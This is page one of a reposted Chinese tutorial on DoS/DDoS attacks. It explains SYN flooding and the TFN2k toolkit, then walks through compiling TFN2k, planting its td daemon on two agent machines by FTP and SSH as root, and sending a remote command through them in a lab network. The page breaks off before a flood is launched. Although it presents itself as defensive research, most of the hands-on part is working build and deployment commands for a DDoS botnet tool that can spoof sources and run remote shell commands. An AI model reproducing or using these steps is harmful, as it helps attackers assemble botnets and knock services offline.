首先,我写这篇文章的目的,并不是我想成为什么hacker之类,而且我不并不鼓励任何人利用它来做一些有损他人的事情,我只是想多一些人关注网络安全,共同研究并防御DOS。因为我是深受其害:(,所以,这篇文章仅用于技术参考,供大家研究DDOS防御之用。如果你利用它来做一些不合法的事情,那结果与我无关。 拒绝服务攻击(DOS,Denial Of Service)可以指任何使服务不能正常提供的操作。如软件bug,操作失误等。不过现在因为失误操作而造成的dos,可能性非常小,更多的是恶意的攻击行为。现在拒绝服务攻击早已演变为分布式拒绝服务攻击(DDOS,Distributed Denial Of Service),利用更多的代理集中攻击目标,其危害更大。 我们大家都知道tcp/ip协议现在已经成为整个internet框架协议,可以说,如果没有tcp/ip,至少internet不会像现在这样普及,甚至不可能会有internet。但凡事皆有两面性,tcp/ip使我们大家受益,同时因为协议本身构造的问题,它也成为别人攻击我们的工具。我们以tcp三握手建立连接的过程来说明。 一、tcp syn flood 1.客户端(client)发送一个包含SYN(synchronize)的tcp包至服务器,此数据包内包含客户端端口及tcp序列号等基本信息。 2.服务器(server)接收到SYN包之后,将发送一个SYN-ACK包来确认。 3.客户端在收到服务器的SYN-ACK包之后,将回送ACK至服务器,服务器如接收到此包,则TCP连接建立完成,双方可以进行通讯(感觉像,一拜天地...二拜高堂...送入洞房...哈哈) 问题就出在第3步,如果服务器收不到客户端的ACK包,将会等待下去,这种状态叫做半连接状态。它会保持一定时间(具体时间不同操作系统不同),如果SYN请求超过了服务器能容纳的限度,缓冲区队列满,那么服务器就不再接收新的请求了,其他合法用户的连接都被拒绝掉。这种攻击往往事半'罪'倍,杀伤力超强。 当然,DOS攻击的方法多种多样,如:UDP flood,ICMP/Ping,ICMP/SMURF...,具体原理的介绍大家可以到 http://www.chinaitlab.com/www/special/ciwddos.ASP去看看,有很详细的原理及常用攻击软件介绍。不过说到DOS攻击软件,最具代表的莫过于tfn2k (Tribe Flood Network 2000),其作者是德国大名鼎鼎的mixter(其主页http://mixter.void.ru/papers.Html),好像最近正在埋头搞什么tfn3k,哎~~,不知道又有多少人寝食难安了... 二.tfn2k攻击原理 1.tfn2k的攻击体系。 tfn2k应该算是DDOS攻击中的代表作,其所能实现的功能让人瞠目结舌,叹为观止...(对它的敬畏有如滔滔江水,延续不绝...)来看看它的架构。 主控端---运行tfn客户端,来遥控并指定攻击目标,更改攻击方法.(罪大恶极) 代理端---被植入并运行td进程的牺牲品,接受tfn的指挥,攻击的实施者.需要注意的是,一个攻击者,往往控制多台代理来完成攻击,而且其系统多为unix,Linux等.(可怜的牺牲品) 目标主机---被攻击的主机或网络,曾经被DDOS的有Yahoo、Amazon、CNN、e-bay等.(最大的受害者,郁闷如我) 2.tfn2k特性。 ◆ 主控端通过TCP、UDP、ICMP或随机性使用其中之一(默认.随机)的数据包向代理端主机发送命令,攻击方法包括TCP/SYN、UDP、ICMP/PING、混合攻击、TARGA3等。 ◆ 主控端与代理端的通讯采取单向,即主控端只向代理端发送命令,并且会采取随机的头信息,甚至虚拟的源地址信息,代理端不会逆向向主控端发送任何信息. ◆ 所有命令经过CAST-256算法加命,其关键字即编译程序时的输入的口令.并且这个口令做为唯一认证凭证. ◆ 利用td进程,主控端可以远程执行shell命令. ◆ td进程的名称可以在编译时更改,更便于隐藏. ◆ tfn可以编译运行于win32及linux系统的. ... 至于伪造源IP地址等功能,更是基本功能,并且其与老版本的tfn相比,它的发包效率更高,我自已的测试,在短短不到5分钟,两台代理机,使我的redhat linux 9.0系统瘫痪. 三.tfn2k 实战测试 1.测试环境: 软件:redhat linux 9.0 硬件平台: master: IP: 192.168.0.6 PIV2.4/256*2/rtl8139 Ag1 : IP: 192.168.0.2 PIV2.4/256*/rtl8139 AG2 : IP: 192.168.0.3 pIV2.6/512*2/3c905 AIM: 192.168.0.5 pIV2.66c/512*2/3c905 switch: D_link des 1024R 1.下载tfn2k.tgz(因为此软件非比寻常,所以我并不提供下载地址,如果有兴趣,自已到网上找吧) 2.解压: tar zxvf tfn2k.tgz 3.修改文件 A. src/Makefile 如果你的系统是linux系统,不需要做任何修就可以,如果是win32系统,请将 # Linux / *BSD* / Others CC = gcc CFLAGS = -Wall -O3 CLIBS = 这几行注释掉,并将 # Win32 (cygwin) #CC = gcc #CFLAGS = -Wall -DWINDOZE -O2 #CLIBS = 这几行的注释去掉.因为我的测试系统为redhat linux 9.0所以并未做任何修改. B. src/config.h ,默认的就可以用,如果感兴趣,可以照其注释信息进行调整。 C. src/ip.h 这里要做一些修改,否则编译会有错误,发生重复定义。 /*strUCt in_addr { unsigned long int s_addr; };*/ 注意啊~~我可是将它放在"/* */"之间,也就是注释掉了:) D.更改编译器: 因为tfn2k支持的是egcs-1.1.2-30,而redhat linux9.0所包含的是gcc-3.2.2-5,所以如果不替换掉gcc,tfn2k是编译不过去的.需要注意的是,更改之后,有可能会造成基于gcc3.2.2的软件编译不去,请谨慎而行. 方法很简单的,找到一张redhat linux 6.2安装盘,将egcs-1.1.2-30.rpm、cpp-1.1.2-30.rpm拷到~/ cd /mnt/cdrom/Redhat/RPMS cp egcs-1.1.2-30* cpp-1.1.2-30* ~/ 安装cpp rpm -Uvh --nodeps --oldpackage cpp-1.1.2-30.i386.rpm 安装egcs rpm -Uvh egcs-1.1.2-30.i386.rpm (如果提示有误,用nodeps、oldpackages、ignoreos等参数忽略过去就是了) 4.编译tfn2k cd tfn2k/src make 首先会谈出一个声明,你必须接受,之后会提示输入8-32位密码,前边提到过,这是唯一的认证凭证,会被分发于td进程中,所以一定要记牢噢~。 编译通过后,会产生td及tfn,这就是大名鼎鼎的tfn2k啦~,td是守护进程,用来安装在代理中的,而tfn就是控制端. 5.安装td. 将td上传到我的两台代理,ag1(192.168.0.2)和ag2(192.168.0.3) ,因为我只不过测试,所以用的是合法的root来上传并执行td进程的,如果真要找到并安装一个代理,你可能得费点儿神,因为没有一个管理员会说“come on baby ~~.我给你root,来安装td做代理吧” [root@test /] FTP 192.168.0.2 Connected to 192.168.0.2. 530 Please login with USER and PASS. 530 Please login with USER and PASS. Name (192.168.0.2:root): wjpfjy 331 Please specify the passWord. Password: 230 Login successful. Have fun. Remote system type is UNIX. Using binary mode to transfer files. ftp> put td (上传td) local: td remote: td 227 Entering Passive Mode (192,168,0,3,198,225) 553 Could not create file. ftp> by (退出ftp) 221 Goodbye. [root@test /]ssh 192.168.0.2 //登陆到ag1 以执行td ,注意,我用的是root帐户,这样才有足够的权限来执行它.
[email protected]'s password: Last login: Tue Feb 24 06:51:13 2004 [root@ ag1 /]find / -name td -print //找到刚上传过来的文件td. [root@ ag1 wjpfjy/]chmod a+x td //使之具有执行权限. [root@ ag1 wjpfjy/]./td //运行td ,这样你就拥有一个代理了,它会对你唯命是从的:(。 用同样的方法在ag2 (192.168.0.3)上安装并运行TFN2k进程td. 6.攻击开始(悲惨的回忆上演中...) 回到master(192.168.0.6 ),准备演练... [root@master root]#touch host.txt //建立代理记录文件(因为如果你足够无聊的话,有可能会建立很多的肉鸡- //代理,不记下会忘记的噢.) [root@master root]echo "192.168.0.2" > host.txt 将执行过td的ag1加入host.txt。 [root@master root]echo "192.168.0.3" >> host.txt 添加ag2到host.txt . 先来测试一下链接。 [root@master root]./tfn -f host.txt -c 10 -i "mkdir wjpfjy" 与host.txt中的代理通讯,让其执行命令mkdir wjpfjy即建立一个目录 Protocol : random Source IP : random Client input : list Command : execute remote command Password verification: //这里,会被提示输入密码,也就是编译时输入的密码,如果错了,将无法与td进程通讯 Sending out packets: .. 到ag1和ag2看看有没有建立目录名wjpfjy,一般情况下,
[1] [2] 下一页
(出处:http://www.sheup.com)
上一页 [1] [2]